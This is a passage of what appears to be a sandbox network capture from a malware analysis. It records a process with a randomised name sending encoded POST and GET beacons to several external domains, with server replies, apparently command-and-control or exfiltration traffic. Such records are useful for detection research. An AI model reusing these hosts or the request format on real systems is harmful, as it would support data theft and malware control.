Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	50024	67.223.117.142	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:32:48.062088966 CET	807	OUT	POST /brrb/ HTTP/1.1 Host: www.flikka.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.flikka.site Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 223 Referer: http://www.flikka.site/brrb/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 43 77 30 5a 79 30 4c 56 42 4d 37 39 44 39 5a 5a 59 43 56 6d 71 70 45 6b 74 37 53 61 4b 67 4a 41 35 35 4a 74 51 76 2f 62 63 48 47 59 67 38 62 48 56 4e 39 55 77 67 58 47 72 74 52 44 4c 44 6d 68 50 70 44 77 6d 33 59 46 59 75 74 6a 74 65 48 45 67 44 42 6e 56 52 59 6d 51 30 54 2b 73 5a 32 70 55 53 31 54 55 6e 56 49 57 6d 44 44 34 68 6d 45 57 62 35 48 76 2f 79 68 54 4c 79 70 6a 69 6d 56 36 6d 54 35 4c 69 52 68 54 48 31 6a 5a 70 34 34 61 71 39 59 74 33 6e 56 38 36 4f 70 34 43 6a 64 46 4f 59 4d 32 78 62 4a 79 61 37 64 48 59 39 4a 72 36 6b 69 32 39 68 50 79 74 6e 46 6e 45 65 6a 76 35 44 4f 39 4d 63 41 30 55 31 59 65 62 4d 66 53 36 57 37 36 59 34 3d Data Ascii: Ir8HUj=Cw0Zy0LVBM79D9ZZYCVmqpEkt7SaKgJA55JtQv/bcHGYg8bHVN9UwgXGrtRDLDmhPpDwm3YFYutjteHEgDBnVRYmQ0T+sZ2pUS1TUnVIWmDD4hmEWb5Hv/yhTLypjimV6mT5LiRhTH1jZp44aq9Yt3nV86Op4CjdFOYM2xbJya7dHY9Jr6ki29hPytnFnEejv5DO9McA0U1YebMfS6W76Y4=
Nov 11, 2024 08:32:48.663258076 CET	533	IN	HTTP/1.1 404 Not Found Date: Mon, 11 Nov 2024 07:32:48 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	50025	67.223.117.142	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:32:50.608810902 CET	10889	OUT	POST /brrb/ HTTP/1.1 Host: www.flikka.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.flikka.site Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 10303 Referer: http://www.flikka.site/brrb/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 43 77 30 5a 79 30 4c 56 42 4d 37 39 44 39 5a 5a 59 43 56 6d 71 70 45 6b 74 37 53 61 4b 67 4a 41 35 35 4a 74 51 76 2f 62 63 48 65 59 67 4f 44 48 54 73 39 55 69 77 58 47 6f 74 52 43 4c 44 6e 6b 50 70 4c 30 6d 33 55 56 59 6f 78 6a 73 39 2f 45 69 78 70 6e 4f 42 59 6d 53 30 54 46 76 70 32 38 55 53 6c 74 55 6e 46 49 57 6d 44 44 34 6a 2b 45 43 36 35 48 38 76 79 75 55 4c 79 62 6e 69 6e 41 36 6d 62 48 4c 69 45 61 53 32 4a 6a 5a 4a 6f 34 59 59 56 59 68 33 6e 54 39 36 4f 78 34 43 65 44 46 50 30 75 32 78 76 77 79 5a 6e 64 45 38 67 50 76 36 51 62 6a 39 78 68 77 2b 62 54 6f 54 4b 63 70 37 50 6b 7a 2b 45 65 70 56 49 31 53 38 78 71 42 36 6a 2b 6e 4e 73 61 62 47 74 37 30 65 33 56 75 4a 45 48 4f 55 66 76 2f 36 67 56 4b 4a 33 67 79 68 35 4d 34 6c 79 57 63 6b 68 33 38 2b 4b 2b 2b 53 79 6c 34 71 37 79 54 65 39 46 6a 78 73 58 41 54 79 78 73 73 50 6b 4c 6f 64 4e 36 79 74 66 45 35 7a 45 57 57 76 58 31 4e 4d 45 5a 58 2f 70 73 6e 4e 2f 33 56 51 6d 6e 2b 58 68 5a 41 64 77 61 71 67 42 66 57 7a 55 7a 32 69 [TRUNCATED] Data Ascii: Ir8HUj=Cw0Zy0LVBM79D9ZZYCVmqpEkt7SaKgJA55JtQv/bcHeYgODHTs9UiwXGotRCLDnkPpL0m3UVYoxjs9/EixpnOBYmS0TFvp28USltUnFIWmDD4j+EC65H8vyuULybninA6mbHLiEaS2JjZJo4YYVYh3nT96Ox4CeDFP0u2xvwyZndE8gPv6Qbj9xhw+bToTKcp7Pkz+EepVI1S8xqB6j+nNsabGt70e3VuJEHOUfv/6gVKJ3gyh5M4lyWckh38+K++Syl4q7yTe9FjxsXATyxssPkLodN6ytfE5zEWWvX1NMEZX/psnN/3VQmn+XhZAdwaqgBfWzUz2iYKYtZfznm4v9h/f3F1VrYhEGlWpceSo9aLmtk+RfPXY7Ud6NPfmWOfiewf4IMBiOtuWX04/3R6SOrQlL28xzYzhpaFhnr7f12IvShUskdr9mzUOvEoQfT+bcbsSiiPz5KejFEl029QdsaCvf93OcdHROy+2lY9PY0Kwx+5h0Ok9ismeNG8a+0onQvNBEmuQMP3sePheOddeEm5HYJpT/8yFud0GEHiY0MJQUg0oD7m3PC2LTaJgdoyCwdVlivwFPXmQqB9ApR/r6ESw/pyMY3beMmoz+dFU8zJxPrWPK/jUciOmCUsUdmPnPxwamsdWnyPjoyFrX8hE2A8SPOCAxBmLDhEb/+0RvSaKSoiZrIS0dZ4TGWWdTkYSGqJCn1jo1lDrCXQoqWr0ynl6R30sD9hSUVQJceDZXwOVpFmrUBJDFoYisdGOpBeaPE79LkHMjLbW8cOSHjl03TskCnPU5hnDYjP7n6jVcwivQ84FZY3ZSJw6xAnQFmoDNGG6ebwBVhyfIrEUpB6sDO5ItjBpfLNMxYH/Mu9AYcQOuKNcJRQ3hkw2PLFpxOMP+EmXh8w7ZtqV7VHMh/mjI5OGFFdW9UZQHA4LW4o9E97qVnITg8VPKQfNVer0eElr5DXavDJyFXUN7rVtALMoBSeObE1Tk+Sjo4sPmLl3C3T [TRUNCATED]
Nov 11, 2024 08:32:51.164822102 CET	533	IN	HTTP/1.1 404 Not Found Date: Mon, 11 Nov 2024 07:32:51 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	50026	67.223.117.142	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:32:53.153119087 CET	532	OUT	GET /brrb/?Ir8HUj=Pyc5xCH2FNTrUJIJcyFngeQJg4SvOnlrloocc6vOBweawvT0T5Z/ogiftYZRDFuocKSPtlVGb/YM09jHyAcWaQwrV3rluoKHVSlnOVUNWjSt4yW6AKlEvfo=&gRU0e=jXFT04FhvBZ8j0BP HTTP/1.1 Host: www.flikka.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 11, 2024 08:32:53.708316088 CET	548	IN	HTTP/1.1 404 Not Found Date: Mon, 11 Nov 2024 07:32:53 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	50027	3.33.130.190	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:32:58.819331884 CET	799	OUT	POST /i4bc/ HTTP/1.1 Host: www.ladylawher.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.ladylawher.shop Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 203 Referer: http://www.ladylawher.shop/i4bc/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 43 35 30 4f 58 39 4a 46 56 4e 41 66 4b 38 62 52 75 5a 32 70 35 6c 67 50 78 39 30 63 48 31 4b 67 63 4c 2f 7a 63 6e 34 73 55 65 53 69 6e 4a 43 5a 69 48 73 42 30 78 56 41 6d 32 74 50 2f 46 36 38 45 31 45 32 4e 52 37 5a 4e 64 65 59 44 38 2b 59 53 5a 4b 68 6b 55 64 48 48 6e 58 4e 36 6f 31 32 52 44 78 45 33 51 75 42 35 4f 74 62 6d 30 72 43 58 4b 4e 2f 48 55 55 53 4f 62 64 44 2b 47 47 78 38 73 66 6b 67 51 45 7a 7a 47 49 32 6f 6c 58 50 64 7a 34 73 36 68 63 76 68 47 52 53 47 4f 73 69 34 54 74 43 74 6a 42 59 6c 65 79 76 59 56 42 7a 6e 44 37 58 53 38 79 4a 56 41 2f 68 33 39 31 77 6d 41 3d 3d Data Ascii: Ir8HUj=C50OX9JFVNAfK8bRuZ2p5lgPx90cH1KgcL/zcn4sUeSinJCZiHsB0xVAm2tP/F68E1E2NR7ZNdeYD8+YSZKhkUdHHnXN6o12RDxE3QuB5Otbm0rCXKN/HUUSObdD+GGx8sfkgQEzzGI2olXPdz4s6hcvhGRSGOsi4TtCtjBYleyvYVBznD7XS8yJVA/h391wmA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	50028	3.33.130.190	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:33:01.377132893 CET	819	OUT	POST /i4bc/ HTTP/1.1 Host: www.ladylawher.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.ladylawher.shop Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 223 Referer: http://www.ladylawher.shop/i4bc/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 43 35 30 4f 58 39 4a 46 56 4e 41 66 4b 64 4c 52 69 65 43 70 6f 31 67 4d 76 74 30 63 4a 56 4b 6b 63 4c 7a 7a 63 69 41 47 55 49 43 69 6e 72 71 5a 6a 46 45 42 78 78 56 41 2b 47 74 47 37 46 36 6e 45 31 49 51 4e 52 48 5a 4e 64 61 59 44 39 4f 59 53 71 53 69 6c 45 64 46 4b 48 58 50 30 49 31 32 52 44 78 45 33 51 71 37 35 4f 6c 62 6d 46 37 43 58 76 74 77 4a 30 55 54 5a 72 64 44 36 47 47 31 38 73 66 47 67 54 41 5a 7a 45 77 32 6f 68 54 50 64 48 6b 74 77 68 63 6c 76 6d 51 74 56 4e 39 54 34 52 49 55 6b 53 5a 44 6a 64 4f 4c 55 7a 4d 70 32 79 61 41 41 38 57 36 49 48 32 56 36 2b 49 35 39 49 74 63 58 6b 35 74 79 4d 51 63 6d 55 52 66 49 4d 57 32 64 30 6b 3d Data Ascii: Ir8HUj=C50OX9JFVNAfKdLRieCpo1gMvt0cJVKkcLzzciAGUICinrqZjFEBxxVA+GtG7F6nE1IQNRHZNdaYD9OYSqSilEdFKHXP0I12RDxE3Qq75OlbmF7CXvtwJ0UTZrdD6GG18sfGgTAZzEw2ohTPdHktwhclvmQtVN9T4RIUkSZDjdOLUzMp2yaAA8W6IH2V6+I59ItcXk5tyMQcmURfIMW2d0k=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	50029	3.33.130.190	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:33:03.915697098 CET	10901	OUT	POST /i4bc/ HTTP/1.1 Host: www.ladylawher.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.ladylawher.shop Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 10303 Referer: http://www.ladylawher.shop/i4bc/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 43 35 30 4f 58 39 4a 46 56 4e 41 66 4b 64 4c 52 69 65 43 70 6f 31 67 4d 76 74 30 63 4a 56 4b 6b 63 4c 7a 7a 63 69 41 47 55 49 4b 69 6e 36 4b 5a 6a 6b 45 42 32 78 56 41 7a 6d 74 44 37 46 36 6d 45 31 51 63 4e 52 4c 6e 4e 66 79 59 44 62 36 59 51 62 53 69 73 45 64 46 57 33 58 4b 36 6f 30 73 52 44 42 41 33 51 36 37 35 4f 6c 62 6d 47 7a 43 52 36 4e 77 4c 30 55 53 4f 62 64 50 2b 47 47 4a 38 73 58 38 67 53 30 6a 79 33 34 32 6f 42 44 50 47 53 34 74 79 42 63 72 36 6d 51 31 56 4e 78 49 34 52 55 75 6b 53 39 39 6a 61 6d 4c 58 6c 56 42 6a 6a 4b 50 58 4f 36 58 63 51 4f 74 31 64 73 30 6b 34 68 47 47 55 78 46 79 64 6f 30 69 54 78 62 50 38 36 53 42 42 4c 4f 39 72 68 44 78 50 6c 47 2b 78 52 2f 6a 4d 44 4e 55 6e 64 58 63 37 51 77 39 77 2b 44 63 59 4f 33 59 47 70 68 6a 55 64 48 57 38 42 2b 68 58 6d 63 79 30 30 39 66 42 44 43 51 56 65 62 39 33 51 36 63 54 76 58 6e 41 6c 38 73 76 4b 6f 38 55 62 30 42 4a 37 64 62 6f 43 70 32 64 71 4e 47 51 53 4f 6c 69 45 50 30 2f 2b 32 78 63 56 32 78 6e 4f 53 62 2b 66 [TRUNCATED] Data Ascii: Ir8HUj=C50OX9JFVNAfKdLRieCpo1gMvt0cJVKkcLzzciAGUIKin6KZjkEB2xVAzmtD7F6mE1QcNRLnNfyYDb6YQbSisEdFW3XK6o0sRDBA3Q675OlbmGzCR6NwL0USObdP+GGJ8sX8gS0jy342oBDPGS4tyBcr6mQ1VNxI4RUukS99jamLXlVBjjKPXO6XcQOt1ds0k4hGGUxFydo0iTxbP86SBBLO9rhDxPlG+xR/jMDNUndXc7Qw9w+DcYO3YGphjUdHW8B+hXmcy009fBDCQVeb93Q6cTvXnAl8svKo8Ub0BJ7dboCp2dqNGQSOliEP0/+2xcV2xnOSb+f8hsMfw+Z0Li2sGAz0bbUNJh73FvqDagdvqywTkcuHCsDSNmzvi2PpXX3KwHJ8Ofvpg0at7ruNenpGqDzNFyBz5N0G1pyZDTFfIY+AIpIT5Q7GGmKBsIewYqj7DKIwzT4sHVn5IIcwlNHa9CbvxvD+1iL5+jLjHOoG9fClNQ8oV+Bl6tEPdbWZAlt9CCYcAfysPWsFzPl4GQqQAfmGOz0Mk4AW2VPYSwfGhT7VkWdjT6ADXGFcQtEjl5mBFhFQso4LaoNsEdpjdhz0yMRGaGeIF7fwR2csJsM35TyW+sPvv1ovQDtMZx8jtW1e6fxFndrH9GeT8mw2BdVa5O4dIx2XjFB3ijSPliF3FO9Ej5thQFgrd96nsCjO/puDIQXRE7XKNh9bjHbfbtQmqWT9L5hjZ1Z4fAhpgpMOohKdQ5k6BiTC2XgcHGiUrdMvEAfKKyaQu7aMGXIqUcbWT4YBBhnpAVzQTzAoIE4IPZOLJ/M5CRfQqGnoP16RF4QB6pGZdgqKrV1kgTQ5+EUs/gRZG6E1+m9e1NH7qF6UdUea86W/Wh7y4q/5pfuodrbcCHJM9rCBRjH74sUK0LlOWukBUv8+OjhftFX1DvzYXdU1Obmt2LLKos4kTx5/e5exy9IFLePTXg6aXMUN6oCeXHuMSHU3fSLbbOWsqIZ+Y [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	50030	3.33.130.190	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:33:06.642258883 CET	536	OUT	GET /i4bc/?Ir8HUj=P7cuULF9RNNpbZDPqOSIjiALg+sZAwaoAqjHQXQRXIOUhYGrthov5xR31GNCxCywGXd8BQaSBdu7etG1CrfHuWVBHlP07YMsKwlH7wrGl8lSs0vEOZdyfzQ=&gRU0e=jXFT04FhvBZ8j0BP HTTP/1.1 Host: www.ladylawher.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 11, 2024 08:33:07.062824965 CET	405	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 11 Nov 2024 07:33:07 GMT Content-Type: text/html Content-Length: 265 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 49 72 38 48 55 6a 3d 50 37 63 75 55 4c 46 39 52 4e 4e 70 62 5a 44 50 71 4f 53 49 6a 69 41 4c 67 2b 73 5a 41 77 61 6f 41 71 6a 48 51 58 51 52 58 49 4f 55 68 59 47 72 74 68 6f 76 35 78 52 33 31 47 4e 43 78 43 79 77 47 58 64 38 42 51 61 53 42 64 75 37 65 74 47 31 43 72 66 48 75 57 56 42 48 6c 50 30 37 59 4d 73 4b 77 6c 48 37 77 72 47 6c 38 6c 53 73 30 76 45 4f 5a 64 79 66 7a 51 3d 26 67 52 55 30 65 3d 6a 58 46 54 30 34 46 68 76 42 5a 38 6a 30 42 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Ir8HUj=P7cuULF9RNNpbZDPqOSIjiALg+sZAwaoAqjHQXQRXIOUhYGrthov5xR31GNCxCywGXd8BQaSBdu7etG1CrfHuWVBHlP07YMsKwlH7wrGl8lSs0vEOZdyfzQ=&gRU0e=jXFT04FhvBZ8j0BP"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	50031	113.20.119.31	80	5608	C:\Program Files (x86)\OXOuezjFcVFTfpVvfvFTssIgpIuZwvGfejPmsErpeorGpGroaEwXT\DvhYoKnukykMD.exe

Timestamp	Bytes transferred	Direction	Data
Nov 11, 2024 08:33:12.160445929 CET	820	OUT	POST /c1ti/ HTTP/1.1 Host: www.primeproperty.property Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.primeproperty.property Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 203 Referer: http://www.primeproperty.property/c1ti/ User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36 Data Raw: 49 72 38 48 55 6a 3d 5a 55 39 70 6a 4a 54 4d 7a 61 68 70 68 72 48 51 31 5a 70 47 37 63 77 54 64 31 66 66 33 66 35 44 54 62 73 46 33 65 55 71 4e 67 4e 4c 30 78 35 63 59 7a 4f 64 76 35 52 4e 73 6b 30 45 2b 58 52 30 6b 2f 48 7a 41 72 71 4c 6c 58 79 34 65 72 55 64 47 73 67 59 33 7a 6f 77 69 72 33 48 62 6b 71 50 78 70 45 5a 76 4e 36 67 71 52 37 64 70 69 32 51 72 47 44 6e 36 7a 57 55 6b 2f 42 66 49 41 6a 73 49 73 46 70 39 65 7a 46 72 33 31 49 6c 37 4e 67 76 73 73 7a 56 57 41 39 58 66 44 45 54 34 53 35 73 34 53 58 48 65 54 6c 5a 55 57 69 67 57 67 69 4b 4e 42 48 71 32 58 33 49 4a 76 46 43 36 35 52 31 51 3d 3d Data Ascii: Ir8HUj=ZU9pjJTMzahphrHQ1ZpG7cwTd1ff3f5DTbsF3eUqNgNL0x5cYzOdv5RNsk0E+XR0k/HzArqLlXy4erUdGsgY3zowir3HbkqPxpEZvN6gqR7dpi2QrGDn6zWUk/BfIAjsIsFp9ezFr31Il7NgvsszVWA9XfDET4S5s4SXHeTlZUWigWgiKNBHq2X3IJvFC65R1Q==
